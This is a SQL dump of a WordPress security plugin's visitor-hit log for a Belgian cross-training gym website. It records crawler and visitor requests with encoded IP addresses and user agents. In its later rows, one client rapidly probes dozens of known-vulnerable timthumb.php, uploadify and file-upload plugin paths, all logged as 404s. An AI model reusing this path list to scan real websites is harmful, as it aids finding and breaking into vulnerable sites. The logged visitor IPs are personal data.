(69697, 1492484848.695513, 2760155472, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69698, 1492486495.630021, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69699, 1492486495.659232, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69700, 1492486496.117246, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69701, 1492486586.898832, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69702, 1492486588.420225, 1570674758, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69703, 1492489334.260030, 1137333282, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69704, 1492494166.616685, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69705, 1492505140.467176, 3024883590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69706, 1492510439.817422, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69707, 1492511625.240552, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69708, 1492512325.955946, 2680901981, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '213.186.33.3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(69709, 1492514663.196246, 1405506603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/88.0.0.60.70;FBBV/55239788;FBDV/iPhone8,2;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/3;FBCR/OrangeFrance;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/55239788]'),
(69710, 1492516187.015025, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69711, 1492516374.222127, 3576798088, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0'),
(69712, 1492516375.160855, 3576798088, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0'),
(69713, 1492520467.480268, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69714, 1492521349.239674, 1123631302, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(69715, 1492522528.117511, 2509961625, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(69716, 1492525721.800792, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69717, 1492528825.738496, 3223591686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crossfitvictoria.com/', 'Opera/9.80 (J2ME/MIDP  Opera Mini/4.0.10031/24.743  U  ru) Presto/2.5.25 Version/10.54'),
(69718, 1492528829.349187, 3223591686, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Opera/9.80 (J2ME/MIDP  Opera Mini/4.0.10031/24.743  U  ru) Presto/2.5.25 Version/10.54'),
(69719, 1492533334.673565, 3475901770, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69720, 1492538480.117815, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69721, 1492540393.320055, 1375157742, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-E500H Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69722, 1492540955.327137, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69723, 1492540957.354364, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69724, 1492540958.830169, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69725, 1492540959.246290, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69726, 1492540959.713541, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69727, 1492540960.112090, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69728, 1492540960.537307, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69729, 1492540966.532502, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69730, 1492540966.969140, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69731, 1492540967.363658, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69732, 1492541303.887356, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69733, 1492541304.403696, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69734, 1492541304.861306, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69735, 1492541305.323484, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69736, 1492542753.292630, 3512707053, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(69737, 1492543785.814189, 1834526946, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69738, 1492543812.871543, 1834526946, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69739, 1492545498.198934, 3423455627, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)'),
(69740, 1492545797.555905, 2990433199, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)'),
(69741, 1492546708.042557, 1334242039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'),
(69742, 1492546818.219294, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69743, 1492561948.112110, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69744, 1492562786.663647, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69745, 1492566349.105053, 856636214, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69746, 1492566349.681839, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69747, 1492566349.682891, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/diamond-ray/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69748, 1492566349.683993, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/brochure-melbourne/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69749, 1492566349.774133, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69750, 1492566350.146452, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Transcript/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69751, 1492566350.179522, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/pearlie/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69752, 1492566350.208932, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69753, 1492566350.373367, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/delight/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69754, 1492566350.662579, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/a-gallery/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69755, 1492566350.674854, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/thrillingtheme/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69756, 1492566350.885129, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/optimize/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69757, 1492566351.059509, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/dandelion_v2.6.4/functions/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69758, 1492566351.138199, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/mymag/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69759, 1492566351.203277, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/swift/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69760, 1492566351.414073, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/suffusion/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69761, 1492566351.483773, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/DeepBlue/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69762, 1492566351.614487, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/DelicateNews/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69763, 1492566351.849682, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/ElegantEstate/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69764, 1492566351.913825, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/myjourney_3.1/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69765, 1492566351.954838, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/redlight/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69766, 1492566352.114766, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/gunungkidul/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69767, 1492566352.225781, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/neofresh/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69768, 1492566352.361732, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/seo-image-galleries/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69769, 1492566352.503148, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/sugar-slider/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69770, 1492566352.583530, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/cruz/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69771, 1492566352.610052, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/typebased/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69772, 1492566352.843769, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/simplewhite/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69773, 1492566352.944677, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69774, 1492566353.003415, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/deliciousmagazine/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69775, 1492566353.021978, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/myjourney/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69776, 1492566353.398066, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69777, 1492566353.404781, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69778, 1492566353.456023, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/SimplePress/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69779, 1492566353.473754, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/meenews-newsletter/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69780, 1492566353.770860, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Premium_Gallery_Manager/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69781, 1492566353.771417, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/eNews/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69782, 1492566353.932841, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/snowblind/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69783, 1492566353.979723, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/wp-clear-prem/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69784, 1492566354.132996, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69785, 1492566354.151783, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/a-supercms/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69786, 1492566354.464931, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/squeezepage/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69787, 1492566354.487734, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Nova/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69788, 1492566354.526744, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/granite-lite/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69789, 1492566354.548485, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/introvert/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69790, 1492566354.939765, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cms-pack/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69791, 1492566355.138631, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/comet/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69792, 1492566355.162513, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/verve-meta-boxes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69793, 1492566355.174101, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/modularity2/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69794, 1492566355.331427, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/InterPhase/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69795, 1492566355.672080, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/tribune/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69796, 1492566355.730236, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/epione/script/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69797, 1492566355.733910, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wordpress-gallery-plugin/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69798, 1492566355.809098, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/libs/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69799, 1492566356.095047, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/smart-related-posts-thumbnails/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69800, 1492566356.103297, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Memoir/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69801, 1492566356.107376, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/layouts/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69802, 1492566356.269437, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/retreat/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69803, 1492566356.608982, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/aio-shortcodes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69804, 1492566356.610573, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/skeptical/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69805, 1492566356.611580, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/multidesign/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69806, 1492566356.717779, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wordpress-thumbnail-slider/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69807, 1492566357.005147, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69808, 1492566357.012530, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/brightsky/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69809, 1492566357.012962, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/modularity/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
